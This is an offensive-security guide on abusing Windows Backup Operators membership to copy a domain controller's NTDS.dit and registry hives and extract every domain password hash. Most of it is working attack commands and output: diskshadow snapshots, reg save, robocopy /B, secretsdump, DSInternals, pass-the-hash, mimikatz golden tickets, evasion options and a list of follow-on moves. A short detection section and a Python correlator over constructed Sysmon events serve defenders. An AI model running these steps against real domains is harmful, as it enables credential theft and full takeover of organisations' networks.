Backup Operators
The Backup Operators group is functionally equivalent to Domain Admin when its members can log on to a Domain Controller. Members hold SeBackupPrivilege and SeRestorePrivilege, which together provide read and write access to any file on the system, bypassing DACLs. On a DC, the path to domain compromise is: enable the privilege → snapshot the C: drive with diskshadow (to bypass the NTDS.dit file lock) → copy NTDS.dit and the SYSTEM registry hive → run secretsdump.py offline → recover every domain user’s NTLM hash including krbtgt and Administrator.
```
# Confirm membership and privileges
whoami /groups | findstr "Backup Operators"
whoami /priv | findstr /i "Backup Restore"

# Enable SeBackupPrivilege (Disabled by default in token)
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege

# Snapshot C: to E: (bypasses NTDS.dit lock)
diskshadow.exe
DISKSHADOW> set context persistent nowriters
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> exit

# Copy NTDS.dit + SYSTEM hive off the shadow copy
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit .\ntds.dit
reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV

# Extract hashes offline (attacker host)
secretsdump.py -ntds ntds.dit -system SYSTEM.SAV LOCAL
```

Success indicator: krbtgt and Administrator NTLM hashes appear in the secretsdump output. From the krbtgt hash, golden tickets give unlimited domain access.
Why Backup Operators is dangerous
The Backup Operators group exists for a reason: members need to back up files they don’t own without granting them full admin rights. The Windows design grants them two privileges:

- `SeBackupPrivilege` - Read any file regardless of DACL, using `FILE_FLAG_BACKUP_SEMANTICS` on `CreateFile`.
- `SeRestorePrivilege` - Write any file regardless of DACL, set ACLs, set owners.
The “backup semantics” flag tells the kernel to skip access checks. Backup software needs this to traverse user profiles, encrypted folders, and protected system directories. Anyone with the privilege can use it for anything - there’s no “backup-only” enforcement.
Additionally:
- Backup Operators members can log on locally to Domain Controllers by default. Regular Domain Users cannot. The `Allow log on locally` user right on DCs includes `BUILTIN\Backup Operators` in default DC configurations.
These two facts compose into a full domain compromise: log on to the DC, use SeBackupPrivilege to read NTDS.dit, extract every domain credential.
This group is treated as equivalent to Domain Admins for risk-modeling purposes in Microsoft’s own guidance, despite the name not implying so.
Confirming membership and privileges
```
C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                 Type             SID          Attributes
========================== ================ ============ ===================================
BUILTIN\Backup Operators   Alias            S-1-5-32-551 Mandatory group, Enabled by default
...
```

The presence of BUILTIN\Backup Operators in the membership list is the indicator.
```
C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeBackupPrivilege             Back up files and directories  Disabled
SeRestorePrivilege            Restore files and directories  Disabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
```

SeBackupPrivilege and SeRestorePrivilege appear, both Disabled. The disabled state is normal - most Windows operations don’t require these privileges, so they’re held but inactive. Enable them programmatically before use.
The SeShutdownPrivilege shown above is also notable - it lets the holder shut down a DC, which on its own is a denial-of-service capability worth flagging in reports.
Enabling the privileges
The SeBackupPrivilege PoC by Giuliano Bertoletti ships two DLLs and a set of PowerShell cmdlets that handle privilege enabling and file copying together. Use these as a unit.

```
PS> Import-Module .\SeBackupPrivilegeUtils.dll
PS> Import-Module .\SeBackupPrivilegeCmdLets.dll

PS> Get-SeBackupPrivilege
SeBackupPrivilege is disabled

PS> Set-SeBackupPrivilege

PS> Get-SeBackupPrivilege
SeBackupPrivilege is enabled
```

The Set-SeBackupPrivilege cmdlet calls AdjustTokenPrivileges internally to flip the state from Disabled to Enabled.
After enabling, whoami /priv confirms:
```
SeBackupPrivilege             Back up files and directories  Enabled
```

Some configurations require an elevated console (UAC consent) before the privilege can be enabled. If the cmdlet fails, run from an elevated shell - whoami /groups will indicate UAC posture.
Bypassing file locks - VSS snapshots
SeBackupPrivilege lets you read any file that the kernel will read. The kernel won’t read files held with exclusive locks - Active Directory locks NTDS.dit for its own use, so even with the privilege, a direct CreateFile on C:\Windows\NTDS\ntds.dit fails.
The standard workaround: take a Volume Shadow Copy snapshot of the C: drive. The shadow copy is a point-in-time read-only volume containing every file as it was at snapshot time. NTDS.dit in the shadow copy isn’t locked because the AD service is using the version on the live volume, not the snapshot.
diskshadow workflow
diskshadow.exe is the built-in Windows tool for managing the Volume Shadow Copy Service. Interactive use:

```
C:\> diskshadow.exe

Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC, 10/14/2020 12:57:52 AM

DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context persistent nowriters
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> exit
```

What each command does:

- `set verbose on` - More output for troubleshooting.
- `set metadata C:\Windows\Temp\meta.cab` - Where to save shadow metadata (deleted on exit if `persistent` isn’t set).
- `set context persistent nowriters` - `persistent` makes the shadow survive diskshadow exit. `nowriters` skips the VSS writer coordination that AD uses - without this, AD might pause or refuse the snapshot.
- `add volume C: alias cdrive` - Identify the volume to snapshot; the alias is for later reference.
- `create` - Actually take the snapshot.
- `expose %cdrive% E:` - Mount the shadow copy as drive letter E:.
- `exit` - Leave the interactive prompt.
After exit, E:\ is the read-only snapshot. Verify:
```
PS> dir E:

    Directory: E:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         5/6/2021   1:00 PM                Confidential
d-----        9/15/2018  12:19 AM                PerfLogs
d-r---        3/24/2021   6:20 PM                Program Files
d-----        9/15/2018   2:06 AM                Program Files (x86)
d-----         5/6/2021   1:05 PM                Tools
d-r---         5/6/2021  12:51 PM                Users
d-----        3/24/2021   6:38 PM                Windows
```

The E:\ drive looks like C:\ at the moment of snapshot. The NTDS.dit on E:\ is not locked by AD.
Non-interactive diskshadow
For scripted use, write the commands to a file:

```
C:\> echo set context persistent nowriters > diskshadow.txt
C:\> echo add volume C: alias cdrive >> diskshadow.txt
C:\> echo create >> diskshadow.txt
C:\> echo expose %cdrive% E: >> diskshadow.txt
C:\> echo exit >> diskshadow.txt

C:\> diskshadow.exe /s diskshadow.txt
```

The /s flag runs from a script file. Useful for embedding in larger automation.
Copying NTDS.dit
With the shadow copy mounted, use the SeBackupPrivilege-aware copy cmdlet:

```
PS> Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
Copied 16777216 bytes
```

The cmdlet uses CreateFile with FILE_FLAG_BACKUP_SEMANTICS plus BackupRead/BackupWrite API calls - the kernel-level path that respects SeBackupPrivilege.
Standard copy or xcopy will fail with access denied even with the privilege enabled, because those commands don’t request FILE_FLAG_BACKUP_SEMANTICS. Use the cmdlet, not copy.
Pulling the SYSTEM hive
NTDS.dit alone is useless - its contents are encrypted with keys derived from the SYSTEM hive’s bootKey. Pull both:

```
C:\> reg save HKLM\SYSTEM C:\Tools\SYSTEM.SAV
The operation completed successfully.

C:\> reg save HKLM\SAM C:\Tools\SAM.SAV
The operation completed successfully.
```

reg save works with SeBackupPrivilege to dump any registry hive to a file. SAM is also useful for local administrator hashes; on a DC, SAM contains the DSRM (Directory Services Restore Mode) administrator account, which is often shared across DCs.
Robocopy alternative
The built-in robocopy utility has a /B flag for “backup mode” which uses backup semantics:

```
C:\> robocopy /B E:\Windows\NTDS .\ntds ntds.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Thursday, May 6, 2021 1:11:47 PM
   Source : E:\Windows\NTDS\
     Dest : C:\Tools\ntds\

    Files : ntds.dit

  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

                  New Dir          1    E:\Windows\NTDS\
100%        New File              16.0 m        ntds.dit

------------------------------------------------------------------------------

               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         1         0         0         0         0
   Files :         1         1         0         0         0         0
   Bytes :   16.00 m   16.00 m         0         0         0         0
```

/B is the key flag - it tells robocopy to use backup semantics, which requires SeBackupPrivilege. Without it, robocopy hits the standard access-denied path.
The advantage of robocopy: no external DLLs to drop, no PowerShell modules to import, just a Microsoft-signed binary that’s always present. The disadvantage: more visible in process logs as the canonical “I’m exfiltrating data” pattern.
Extracting credentials offline
Transfer ntds.dit and SYSTEM.SAV to the attacker host. NTDS.dit is large (often hundreds of MB to multiple GB on real domains); plan the transfer accordingly.
secretsdump.py
```
$ secretsdump.py -ntds ntds.dit -system SYSTEM.SAV LOCAL
Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0xc0a9116f907bd37afaaa845cb87d0550
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 85541c20c346e3198a3ae2c09df7f330
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WINLPE-DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7abf052dcef31f6305f1d4c84dfa7484:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a05824b8c279f2eb31495a012473d129:::
htb-student:1103:aad3b435b51404eeaad3b435b51404ee:2487a01dd672b583415cb52217824bb5:::
svc_backup:1104:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
bob:1105:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
```

Output format is `domain\username:RID:LMhash:NThash:::`. RID 500 is the built-in Administrator. RID 502 is the krbtgt account whose hash signs all Kerberos tickets - owning this hash means owning the domain.
The LMhash field is usually aad3b435b51404eeaad3b435b51404ee (empty LM hash) on modern domains because LM hashes are disabled by default. The NThash (NTLM hash) is what matters.
What to do with the hashes
- Administrator (RID 500) - Pass-the-hash to any system: `psexec.py -hashes :NTHASH DOMAIN/Administrator@target`.
- krbtgt (RID 502) - Generate golden tickets with mimikatz: `kerberos::golden /user:Administrator /domain:DOMAIN /sid:DOMAIN-SID /krbtgt:HASH /ptt`. The golden ticket lets you impersonate any user in the domain without their password.
- Computer accounts (RID 1000+) - These end in `$` (e.g., `WINLPE-DC01$`). Useful for AD CS abuse, certificate-based escalation, and various lateral-movement tricks.
- All accounts - Feed the hashes through hashcat (mode 1000 for NTLM) to recover plaintext passwords; this often reveals password-reuse patterns across the org.
DSInternals as alternative extractor
The PowerShell DSInternals module also extracts hashes from NTDS.dit but provides more granular output, including supplemental credentials:

```
PS> Import-Module .\DSInternals.psd1
PS> $key = Get-BootKey -SystemHivePath .\SYSTEM
PS> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key

DistinguishedName: CN=Administrator,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
Sid: S-1-5-21-669053619-2741956077-1013132368-500
SamAccountName: Administrator
SamAccountType: User
Enabled: True
Secrets
  NTHash: cf3a5525ee9414229e66279623ed5c58
  LMHash:
  NTHashHistory:
  Supplemental Credentials:
    Kerberos:
      Credentials:
        DES_CBC_MD5
          Key: d60dfbbf20548938
    KerberosNew:
      Credentials:
        AES256_CTS_HMAC_SHA1_96
          Key: 5db9c9ada113804443a8aeb64f500cd3e9670348719ce1436bcc95d1d93dad43
        AES128_CTS_HMAC_SHA1_96
          Key: 94c300d0e47775b407f2496a5cca1a0a
        DES_CBC_MD5
          Key: d60dfbbf20548938
```

The Kerberos keys (AES256, AES128, DES) are the keys used to encrypt Kerberos tickets. Useful for:
- Pass-the-key (similar to pass-the-hash but with AES Kerberos keys)
- Silver ticket forging for specific services
- Decrypting captured Kerberos tickets offline
DSInternals also reveals password history hashes (NTHashHistory), useful for spotting predictable password rotation patterns.
Cleaning up
After exploitation, optionally clean up the shadow copy:

```
C:\> diskshadow.exe

DISKSHADOW> list shadows all
* Shadow copy ID = {dc69eeb9-99f4-4bbd-94a7-c0a3d5f7e6d3}
...

DISKSHADOW> delete shadows id {dc69eeb9-99f4-4bbd-94a7-c0a3d5f7e6d3}
DISKSHADOW> exit
```

Or unexpose the drive letter without deleting:

```
DISKSHADOW> unexpose E:
```

This leaves the shadow copy in place but removes the visible drive letter. Useful if you need to come back.
Operational considerations
Detection

Backup Operators abuse leaves significant evidence:

- Sysmon event 11 (FileCreate) on `ntds.dit` copies and `*.SAV` registry exports
- Security event 4673 if backup-privilege use is audited (rare default)
- VSS service activity - `Service Control Manager` events when diskshadow runs
- Defender for Identity - alerts on AD-database file access from unusual processes
Modern EDR with AD-aware rulesets will catch the diskshadow → reg save → file copy chain. The technique is well-known and signatured. For evasive engagements, alternative paths are:
- DCSync via `mimikatz lsadump::dcsync` - uses the AD replication API directly, more legitimate-looking on the wire than file copies, but requires the `DS-Replication-Get-Changes` permission rather than `SeBackupPrivilege`
- Volume Shadow Copy Service via `VshadowAPI` rather than `diskshadow.exe` - less obvious binary execution
- NTDSUtil-based dumping - uses the AD-native tool, sometimes flagged less aggressively
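The diskshadow → reg save → NTDS copy chain from the Detection list, as a correlator over Sysmon event 1 and event 11 records. This is an added example, not from the page or any vendor product; the events, hostnames and user names are constructed, and the rule deliberately ignores a lone snapshot (normal backup activity) and the directory service writing its own database.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry (not real logs): Sysmon event 1 = ProcessCreate,
# event 11 = FileCreate, trimmed to the fields the correlation needs.
SAMPLE_EVENTS = [
    {"ts": "2021-05-06T13:02:10", "host": "DC01", "id": 1, "user": "INLANEFREIGHT\\svc_backup",
     "image": "C:\\Windows\\System32\\diskshadow.exe", "cmd": "diskshadow.exe /s diskshadow.txt"},
    {"ts": "2021-05-06T13:03:41", "host": "DC01", "id": 1, "user": "INLANEFREIGHT\\svc_backup",
     "image": "C:\\Windows\\System32\\reg.exe", "cmd": "reg save HKLM\\SYSTEM C:\\Tools\\SYSTEM.SAV"},
    {"ts": "2021-05-06T13:03:42", "host": "DC01", "id": 11, "user": "INLANEFREIGHT\\svc_backup",
     "image": "C:\\Windows\\System32\\reg.exe", "target": "C:\\Tools\\SYSTEM.SAV"},
    {"ts": "2021-05-06T13:04:05", "host": "DC01", "id": 11, "user": "INLANEFREIGHT\\svc_backup",
     "image": "C:\\Windows\\System32\\Robocopy.exe", "target": "C:\\Tools\\ntds\\ntds.dit"},
    # Benign: the directory service writing its own database must not alert.
    {"ts": "2021-05-06T13:05:00", "host": "DC01", "id": 11, "user": "NT AUTHORITY\\SYSTEM",
     "image": "C:\\Windows\\System32\\lsass.exe", "target": "C:\\Windows\\NTDS\\ntds.dit"},
    # Benign: a nightly diskshadow job on a file server with no hive export or NTDS copy.
    {"ts": "2021-05-06T02:00:00", "host": "FS01", "id": 1, "user": "INLANEFREIGHT\\svc_backup",
     "image": "C:\\Windows\\System32\\diskshadow.exe", "cmd": "diskshadow.exe /s nightly.txt"},
]

WINDOW = timedelta(minutes=30)  # how close the stages must be to count as one chain


def classify(ev):
    """Map one event to a chain stage ('snapshot', 'hive_export', 'ntds_copy') or None."""
    image = ev["image"].lower()
    if ev["id"] == 1 and image.endswith("diskshadow.exe"):
        return "snapshot"
    if ev["id"] == 1 and image.endswith("reg.exe") and " save " in ev["cmd"].lower():
        return "hive_export"
    if ev["id"] == 11:
        target = ev["target"].lower()
        # ntds.dit belongs only under \Windows\NTDS\; a copy anywhere else is suspect.
        if target.endswith("ntds.dit") and "\\windows\\ntds\\" not in target:
            return "ntds_copy"
        if target.endswith(".sav"):
            return "hive_export"
    return None


def find_chains(events, min_stages=2):
    """Return {(host, user): sorted stage names} for each actor that hits at least
    min_stages distinct stages inside one WINDOW. Snapshot plus hive export or NTDS
    copy by the same account on the same host is the pattern to page on."""
    staged = defaultdict(list)
    for ev in events:
        stage = classify(ev)
        if stage:
            staged[(ev["host"], ev["user"])].append((datetime.fromisoformat(ev["ts"]), stage))
    hits = {}
    for actor, items in staged.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            stages = {s for t, s in items[i:] if t - t0 <= WINDOW}
            if len(stages) >= min_stages:
                hits[actor] = sorted(stages)
                break
    return hits
```

Running `find_chains(SAMPLE_EVENTS)` flags only svc_backup on DC01 with all three stages; the FS01 backup job and the lsass write produce nothing.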
Restoration
Engagements that require minimal disruption: the shadow copy itself is non-destructive (it’s a read-only snapshot of the live volume), but it consumes disk space. The .SAV files and copied NTDS.dit on the host should be deleted after extraction. Document the timeline carefully - the act of dumping NTDS.dit usually triggers an incident response regardless.
Other use cases for SeBackupPrivilege
Beyond the NTDS.dit attack on DCs, SeBackupPrivilege opens read access to anything on the filesystem:

- Reading other users’ protected files - `Copy-FileSeBackupPrivilege C:\Users\admin\Documents\creds.txt out.txt`
- Reading registry hive backups - `reg save HKU\.DEFAULT default.sav` and similar for any hive
- Reading service binaries owned by `TrustedInstaller` - useful for offline analysis
- Reading other users’ DPAPI master keys - `%APPDATA%\Microsoft\Protect\<SID>\<GUID>` - for credential decryption later

SeRestorePrivilege opens write access:

- Service binary replacement - overwrite `C:\Program Files\<app>\service.exe` with malicious code
- DLL hijacking on protected paths - write to `C:\Windows\System32\` if you can find a missing DLL
- Registry modification - write keys that ordinary users can’t, including autorun locations
The combination of both on a non-DC host is equivalent to local admin via the service binary replacement path.
Quick reference
| Task | Pattern |
|---|---|
| Confirm membership | `whoami /groups \| findstr "Backup Operators"` |
| Confirm privileges | `whoami /priv \| findstr /i "Backup Restore"` |
| Enable SeBackupPrivilege | `Import-Module .\SeBackupPrivilegeCmdLets.dll; Set-SeBackupPrivilege` |
| Check privilege state | `Get-SeBackupPrivilege` |
| Snapshot C: with diskshadow | `set context persistent nowriters; add volume C: alias c; create; expose %c% E:` |
| Scripted diskshadow | `diskshadow.exe /s script.txt` |
| Copy with backup semantics | `Copy-FileSeBackupPrivilege SRC DST` |
| Robocopy with backup mode | `robocopy /B SRC DST FILENAME` |
| Save registry hive | `reg save HKLM\SYSTEM out.sav` |
| Save SAM | `reg save HKLM\SAM SAM.SAV` |
| Save SECURITY | `reg save HKLM\SECURITY SECURITY.SAV` |
| Local extraction (no NTDS) | `secretsdump.py -sam SAM.SAV -system SYSTEM.SAV LOCAL` |
| Domain extraction | `secretsdump.py -ntds ntds.dit -system SYSTEM.SAV LOCAL` |
| DSInternals load | `Import-Module .\DSInternals.psd1; $key = Get-BootKey -SystemHivePath .\SYSTEM` |
| Pass-the-hash with NT hash | `psexec.py -hashes :NTHASH DOMAIN/Administrator@target` |
| Golden ticket from krbtgt | `mimikatz # kerberos::golden /user:Administrator /domain:DOM /sid:SID /krbtgt:HASH /ptt` |
| Cleanup shadow copy | `diskshadow.exe`, then `delete shadows id {ID}` |
| Detection event | Sysmon 11 on `ntds.dit`, Sysmon 1 on `diskshadow.exe` |
| Stealthier alternative | `mimikatz lsadump::dcsync` (requires different permissions) |
For other privilege-based escalation primitives, see SeImpersonate (token impersonation), SeDebugPrivilege (process memory), SeTakeOwnership (file ownership). For other privileged groups with similar domain-compromise potential, see DnsAdmins and Other privileged groups.
Next move
- NTDS.dit + SYSTEM hive obtained → process offline with `secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL`; you now have every domain user’s NT hash including `krbtgt`
- Have `krbtgt` hash → forge golden tickets for persistent domain access (long-lived authentication artifact, survives password changes for ten years)
- diskshadow fails (`failed to create shadow copy`) → VSS writer may be disabled; try the alternative VSS approach via `wmic shadowcopy create Volume='C:\\'`, or use `robocopy /B` directly with the SeBackup token
- SeBackupPrivilegeUtils not on PATH → fall back to PowerShell `Backup-WindowsRoles` or copy the DLL onto the host first; verify `whoami /priv` actually shows `SeBackupPrivilege Enabled` in your current token
- Got the hashes but DC is offline / can’t authenticate → use `secretsdump` LOCAL mode against the offline `ntds.dit` copy; move laterally via pass-the-hash to other hosts using harvested NT hashes
- Not on a DC, just a member server → SeBackup still reads any file as SYSTEM - pivot to credential hunting (unattend.xml, web.config, browser data) or use the privilege to overwrite a service binary